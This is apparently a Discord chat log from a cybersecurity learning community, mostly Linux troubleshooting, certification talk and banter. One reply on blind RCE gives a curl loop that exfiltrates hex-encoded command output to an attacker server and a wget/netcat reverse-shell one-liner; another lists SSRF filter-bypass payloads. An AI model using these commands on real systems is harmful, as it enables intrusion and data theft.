Very nice. I didnt do the college route but rather focused on certifications. As of now, I'm a DoD 8140 (Dept of Defense Directive) CISSP-ISSEP, CCNA Cyber Ops, CCNP Security, ECSA, CEHv10, LPT (master), and OSCP/OSCE/OCEE. That's one of the very fortunate things about the IT industry is 99% of the time, employers could care less about a college degree. When I review resumes/conduct interviews, I look at experience and certifications.
@slender gulch different regions has different view points on that subject. nevertheless it about doing what you like and the eagerness for knowledge. 
Very nice. I didnt do the college route but rather focused on certifications. As of now, I'm a DoD 8140 (Dept of Defense Directive) CISSP-ISSEP, CCNA Cyber Ops, CCNP Security, ECSA, CEHv10, LPT (master), and OSCP/OSCE/OCEE. That's one of the very fortunate things about the IT industry is 99% of the time, employers could care less about a college degree. When I review resumes/conduct interviews, I look at experience and certifications.
@slender gulch MA man.. well done sir.. and thanks for offering your help,. Sharing is carring as we all know.
On the other note, Loving Parrot..
this is deb server not responding right ? I have done no changes to my pc at all, wasnt even at home all day.. so I assume its one of the servers that is down
@slender gulch could you tell me a bit more about the DOD stuff? tried looking it up but the SANS website is a bit finnicky and.. well not clear at all
anyone did jigsaw ?
@grand scroll Probably the wrong chat?
wops XD
why am I facing this ?
@lavish iron I changed my nickname but its Leeroy. Did you have any more specific things you wanted to know about? Specifically related to cyber security and the DoD, check this out. https://www.sans.org/dodd-8140/
https://www.youtube.com/watch?v=n0wvDwSnzcw&t=6s lol this guy drank diamonds
For this video, I'll be making the world's first real diamond water.
To do this, I'll be burning diamonds, which are nearly pure carbon (and definitely not "forever"), to make diamond CO2 gas and then using that CO2 to make extremely expensive carbonate water.
Contest link: h...
@last marlin there could be a few reasons you are getting that issue. Without knowing more details, try doing this.
sudo apt-get update && sudo apt -y dist-upgrade
sudo apt autoremove && sudo apt autoclean
sudo apt-get install -f
If that doesnt work, run sudo apt-get check and let me know the results. In that case you will more than likely need to force manually removing each package and then reinstalling. Feel free to pm me.
I have done all above, and apt check output is : invalid operation check
Ahh I see. Send me a PM and ill get yah fixed up
@slender gulch Stop using apt-get
ITS A HABIT haha
hehehe
@formal iron Fun room, good job ๐
Cheers dude! Thanks for the feedback - glad you managed to get through it @graceful coral :^
I did, just that one wee stumble at the start lol
@formal iron Fun room, good job ๐
@graceful coral what room ?
MAL: Strings
MAL: Strings
@graceful coral Riiight, just noticed it. alrdy Joined
hello where I can get any more references idea about blind rce , I've found some on youtube. but on my case I'm not allowed to back connect. I just don't know how I'll be able to fire my command and see the out since its an blind.
@vale citrus Suggestion on how to proceed:
- turn tcpdump on and filter for icmp requests
- have the remote box to ping you to confirm rce
Method 1.
- Host a SimpleHTTPServer with python
- execute somethjng like this:
for LINE in `ls -la | xxd -r -p`; do curl http://<your ip>/$LINE; done
Method 2.
wget http://yourip/netcat -O /tmp/netcat && chmod +x /tmp/netcat && netcat <your ip> <your lport> -e bash
thatll encode the output of ls -la into hex and stick it into a loop that'll send the hex output to your python simple http server thats listening for incoming requests.
you'll take the incoming requests to the server and decode the hex and you should see the output of ls -la.
thanks @urban crescent
@slender gulch please keep the nicknames PG13 too
@tropic lava Ahh my apologizes! Fixed it.
Linux is a family of open source Unix-like operating systems based on the Linux kernel, an operating system kernel first released on September 17, 1991, by Linus Torvalds. Linux is typically packaged in a Linux distribution.
@leaden wraith heads up, it's against the rules of the discord to randomly DM people. Ask before you DM.
I think probably #522158404614225920 is your best bet @graceful coral! Would like to hear it either way ๐
It's good to hear feedback/ideas for both sides of the fence :^^

sh*t I thought it was damian wayne
lol
Nothing.
He's a spoiled brat, good with stuffs and always trying to prove himself.
Probably.
At some point, Joker almost got him but Batman saved him.
One of the thing was, before the Flashpoint Paradox(pun) happened, his own Mom killed him imao.
True.
Go to sleep @graceful coral
Go sleep
wait... batman got married

wait... batman got married
@glacial shard With catwoman, yes.
Their wedding and Joker and Harley wedding were at same time, iirc.
idk :/
:/
yeah, just sometimes feeling left out
Hey guys. Hope you're all well.
Do you guys have any ideas for a research topic/problem based on social engineering?
Study psychology
@prime helm When you can DM me. is everything okay?
yeah, just sometimes feeling left out
@olive sundial I feel too that way, but remember at the end, we all are from one community :)
i know haha, don't worry ๐
the big THM family
raised by daddy @restive tartan and mommy @strange axle
and Ashu as the father in law
Mods are older siblings, mentors are younger ones lol.
Ah, right.
No wonder we all get along so well.
Mod - older sibling
Mentors & creators - Middle child
Members - youngest
omg YES, china rootkit here we come
WHAT WHERE'S MY VALORANT

i shoulda sold my valorant key kekw
let me say it out laud I HATE BRUTE FORCE
@strong crown dyslexia just played hard on me i read your name in the koth channel and lets say i said somethign in my head that made that sound real bad
you are the third person to tell me that. i'm sorry. it wasn't intended
i know its just one of those thigns were if you dont read it right your brain fills in gaps that wernt there
@olive sundial are you about to become a valorant addict
What would you suggest the number of threads when using Dirbuster ?
depends on your network connection
its 100+ mb
i'm usually using 16/24 on a 80Mbps
but i'd say more would be still safe
try scanning with different ones and scale back when they start to timeout or when it throws errors
im getting so much ingored lately in help room.. anyone has finished joker room ?
@last marlin I haven't seen you post there
@last marlin I haven't seen you post there
@tropic lava well im posting there, dont wanna post again to avoid something like : dont make double post.
I understand there are a lot new guys that might need help more than me
no hard feelings
While using KDE, and i have downloaded parrot-sec KDE during the update, why do i have gnome system-tools in my upgrade list ? why would anything of gnome be in my system ?
just wondering
@last marlin Was the bug with the joker room the image thing?
@last marlin Was the bug with the joker room the image thing?
@tropic lava well I came to that point later on, but my mistake was that I wasnt using nikto with credentials, so I wasnt seeing that backup files.. You live and you learn.
how do you manage your time of learning? any specific time for learning any specific topic?
who, me ?
so seriously off topic but kinda on but kali kinda killed both clover and windows bootloaders now admitted the clover one sucks as it means my hackintosh is unbootable for the forseabel future as it took me 2 months to get that copy bootable but my main issue is i cannot recover my windows bootloader some how no matter what i do with bootsect or bootrec in windows recvoery cmd promt i get system cannot find file sepcifed when i try runnning bootrec /Fixmbr or /FixBoot i tried bootsect /nt60 sys that did nothing either so im kinda at a loss as i really dont want to reinstall windows right now any advice woudl be gretaful
backup your data with a live boot and just reinstall windows
yeah its looking liek the onyl option right noiw
if you already tried bootrec and bootsect, itd be more difficult to fix your bootloader than it would be to reinstall
im booted into my installed kali it was gettign rub to work that i think killed my other bootloaders
yep the only sucky thing about that is reinstallign shit of microsoft store because no microsoft have to be awkward and you cant redetect old isntalls of stuff like forza thats almost 80 gig
steam library is fine atleast that would be actuall suicide if i lost that he says with it all onn a fakeraid0
@graceful coral thanks for the advice tho even if it isnt what i wanted to hear its what i suspected
Windows.old noises
wait can you reimploment stuff from windows.old registry??
cause if thats possible i could dump the reg keys from windows.old annd reinstated them in the new install and recover window store stuff
I'm never fully satisfied with any Microsoft product. Bill Gates.
@graceful coral HELLO?
@nova lynx I see you there. Reacting to my messages
@nova lynx HELLO
Hope you're good
I'm on US West Coast basically at this stage
As for @graceful coral, we aren't friends anymore.
Yeah, I've noticed that with you James.
I'll bitch at you after im done with symphonos 6
same
DM me
erm does anyonne no how to get discord screen share working in kali for soem reason its jsut black screen with cursor
ahh foudn thhe issue im running wayland now i gotta remeber how to swap to xorg
ahh well that was alot less painfull thaty i expected just uncommenting one thing haha
dang discord screen share destroys my cpu usage my audio goes seriously crackly
Anyone using timeshift ?
That was meant to happen and this is not the first time a CTF conducted by SecArmy went to this condition.
anybody who used aircrack gotten segmentation fault 11 after sending deauthentication frame?
I should clarify, I'm trying to break into my OWN network, not somebody else's - i'm not a dick
Does anyone use a non-specific pentesting distro for cybersec?
@pseudo escarp do you mean like self-built?
you can easily install ubuntu or kali light and download everything you need
I.e using Ubuntu as a daily driver & for pentesting
i use parrot home edition for that
Will look at Parrot ๐
I know some people that moved to a dev build of windows for WSL 2, but you lose access to hypervisors other than Hyper-V with that
Planning a pc build in a few months and was thinking Windows for occasional gaming + 3d modelling and Ubuntu for dev & pentesting - Katoolin seems good.
good morning
@latent stirrup we miss you ๐ข
May someone explain me what is PSH?
@graceful coral It stands for Powershell.
@latent stirrup ooh lots of cores haha
yo
pog
Just spent 30 mins trying to figure out why my code was generating one more object that it should've
for i := 0; i <= amount; i++ {
for i := 1; i <= amount; i++ {
Spot the difference
1 0
Because apparently I can't 
๐คฃ
https://github.com/ryanrohypnol/Discord-Custom-Connections
Can everyone with a GitHub account please star this repo.
I'd appreciate it.
I have a plan 
wait, didn't they fix the contact one a while ago?
I created the contact crash
I reported it as well, they didn't even reply to me.
I am Ryan ^^^
figured that out lol :D
i found someone using it and investigated but like a week later it didn't work
Yeah it still "works" just crashes you locally, no one else 
lmao
But the Custom Connections still work.
@formal sparrow created a GUI for people that can't figure out how to execute Python.

Thank you โค๏ธ
The number of zeros in http://127.0.0.1 doesn't matter, So we can use the following payloads to bypass SSRF protection:
http://127.1
http://127.000000000000000.001
http://127.000.000.00000000000000001
...
#bugbounty #bugbountytips
165
423
Can't wait for AMD 4000 Desktop or 5000 series
@cobalt thicket the ctf is running smooth now hope you'll like the challenges ๐
How long's left? Might take a peek in a bit
@quaint elm we had conducted 3 CTFs previously with a good number of audience ,just some issues happened this time
How long's left? Might take a peek in a bit
@cobalt thicket 7 hours ig
6hrs 38min
I too miss me
@latent stirrup niiceeeeee, been meaning to buy that too, but I bought some other toy, electric step ๐ What did you have before that cpu ?
well this is it
Pars you ok?
Hey guys, I have noticed something in linux.. It was in KAli, now i have it in Parrot. For example, 2 programms i have installed. Stacer(optimizer) and Visual studio coding, but afer some updates i see that i have to install them again, cuz they are kinda gone from my system, what could that be ?
im a good boy i swear
> 
